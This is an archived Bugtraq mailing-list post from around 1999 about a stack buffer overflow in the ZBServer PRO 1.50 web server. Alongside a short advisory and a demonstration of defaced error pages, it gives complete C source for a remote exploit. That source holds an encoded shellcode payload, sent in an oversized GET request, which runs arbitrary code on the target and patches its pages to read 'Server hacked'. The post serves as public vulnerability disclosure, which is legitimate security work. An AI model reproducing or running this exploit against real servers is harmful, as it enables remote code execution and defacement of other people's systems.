OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: ZBServer 1.50-r1x exploit (WinNT)

ZBServer 1.50-r1x exploit (WinNT)

Subject: ZBServer 1.50-r1x exploit (WinNT)
From: |Zan (izanTELELINE.ES)
Date: Thu Jan 28 1999 - 06:34:54 CST

hi,

    Few weeks ago USSRBACK found an buffer overflow in ZBServer (GET
command). Well, it is an exploit tested on WinNT 4.0 (spanish version).
It comes back with a raw eip in code (not jumps against "call register"
or "jmp register"). If you want a real portable exploit you can replace
last four bytes against a call edi + x where x > 10 bytes ( i left a lot
of nops waiting that jump }:)

    i reverse the server too and exploit gets keep living ZBServer when
it is exploited (restore registers and kill overflowed thread) so pages
are served out normally. Exploit writes to disk an advisory file with
information for webmasters or administrators. It serves out hacked pages
too but it doesn't modifique any server page (it patchs error messages
in memory).

    A real advisory is attached. Excuse my poor english.

Greets to:
Jack Barnaby AKA Dark Spyrit - http://www.beavuh.org
USSRBACK - http://www.ussrback.com

regards,
|Zan 

--
|Zan   /  DeepZone (tm) - Digital Security Center
http://www.deepzone.org (not available yet, intranet only)
http://mareasvivas.cjb.net

--=[ ... toda la vida buscando respuestas ... y cuando por fin
               las encuentas ... cambian las preguntas ]=--

Studying ZBServer 1.50-r1x overflow

Advisory Name: ZBServer crash Advisory Released: [00/02/01] Application: personal web, ftp and gopher servers on Win9x, WinNT Severity: local/remote user with WebServer privileges can run arbitrary code. Status: overflow discovered by USSRBACK http://www.ussrback.com Author: izangalaxycorp.com WWW: http://www.deepzone.org http://mareasvivas.cjb.net

OVERVIEW ZBServer PRO 1.50 (all releases) has a buffer overflow in web server. Any local/remote user can run arbitrary code with web server privileges. Overflow was discovered by USSRBACK few weeks ago. The original USSRBACK post didn't contain any technical detail. The present document is a deep study about that advisory. It studies bug impact too.

BACKGROUND Ideas and code were tested against Win9x and NT 4.0 sp 5 (all spanish version). The ZBServer PRO software is 1.50. All releases are affected (r13 to r17)

DETAILS ZBServer PRO's WebServer has an overflow in "get command". It can't handle a long excesive request. When the string has a lenght about 766 bytes it crashs. The stack is overwritten.

The vulnerability exists. USSRBACK' status (bof discovers) was originally:

"Vendor Status: i email the vendor, and i dont have a responce :("

We have exploited and finished our exploit for WinNT and it's attached with this advisory. Arbitrary code can run with webserver privileges.

Win9x version can't be exploitable with a clear environment. If you have a default debugger configuration or your processes are handled by a special process hooking errors and exceptions then it can be exploited too but it won't be the common scenary.

Win9x version can't run arbitrary code with a clear environment but a DoS attack is possible. You can crash the service with a local/remote request.

EXPLOIT

ZBServer PRO 1.50-r1x exploit gets remote servers's full control. When you attacks a vulnerable server you can run abitrary code inside. Firstly, sploit creates an advisory file. It's information for administrative use. Later, exploit restores and kills overflowed thread but before it patchs some error information so all error pages will appear like hacked pages.

If you have problems running ZBServer they can be with your return address (remember that tests ran against WinNT sp5 spanish version). I could jump against edi register + 5 (more portable) but i will have a static dll address dependence. Well, it wasn't a clear jump so i decided to implement the first technique but the second is possible too.

ex.

% lynx http://xxx.xxx.xxx.xxx

WELCOME TO ... blah ... blah ..... (It's the root page)

% lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was not found.

% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

FILE NOT FOUND The request object (/FileNotAvailable.html) was not found.

$ zbsploit xxx.xxx.xxx.xxx

WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net - http://www.deepzone.org

Coded by -=[|Zan]=- izangalaxycorp.com - izandeepzone.org

done.

$ lynx http://xxx.xxx.xxx.xxx

WELCOME TO ... blah ... blah ..... (It's the root page again)

% lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html

Hello. You are running a ZBServer PRO's buggy version and

you have been abused.

More information can be downloaded from

http://www.deepzone.org or http://mareasvivas.cjb.net

regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)

Coded by |Zan.

% lynx xxx.xxx.xxx.xxx/FileNotAvailable.html

Server hacked.

http://www.deepzone.org Sploit coded by |Zan

%_

................................................

/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT) ** ** ZBServer PRO 1.50-r1x exploit gets remote servers's full control. ** When you attacks a vulnerable server you can run abitrary code ** inside. Firstly, sploit creates an advisory file. It's information ** for administrative use. Later, exploit restores and kills ** overflowed thread but before it patchs some error information so ** all error pages will appear like hacked pages. ** ** Compile on Debian with kernel 2.2.12: gcc -o slzbserv slzbserv.c ** run: ./slzbserv hostname ** ** http://mareasvivas.cjb.net / http://www.deepzone.org ** ** Coded by |Zan | izangalaxycorp.com ** **/

#include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/errno.h> #include <netdb.h>

#define _PORT 80 #define _TamBuf 770

char crash[] = "GET /" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10" "\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50" "\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18" "\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b" "\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9" "\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99" "\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9" "\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99" "\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02" "\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e" "\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65" "\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca" "\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5" "\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee" "\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9" "\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9" "\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed" "\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5" "\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc" "\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc" "\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed" "\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9" "\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9" "\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9" "\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9" "\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb" "\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7" "\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0" "\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7" "\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9" "\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7" "\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3" "\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7" "\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8" "\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7" "\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3" "\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7" "\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc" "\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc" "\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6" "\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc" "\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3" "\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";

int sock; struct sockaddr_in sock_a; struct hostent *host;

int main (int argc, char *argv[]) {

printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n"); printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n"); printf("Coded by -=[ |Zan ]=- izangalaxycorp.com - izandeepzone.org\n\n");

if(argc < 2) { fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]); exit(0); }

if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) { perror("gethostbyname"); exit(-1); }

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("create socket"); exit(-1); }

sock_a.sin_family=AF_INET; sock_a.sin_port=htons(_PORT); memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length); if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) { perror("create connect"); exit(-1); }

fflush(stdout);

write(sock,crash,_TamBuf); write(sock,"\n\n", 2); printf("done.\n\n");

}

This archive was generated by hypermail 2b27 : Fri Jan 28 2000 - 15:34:27 CST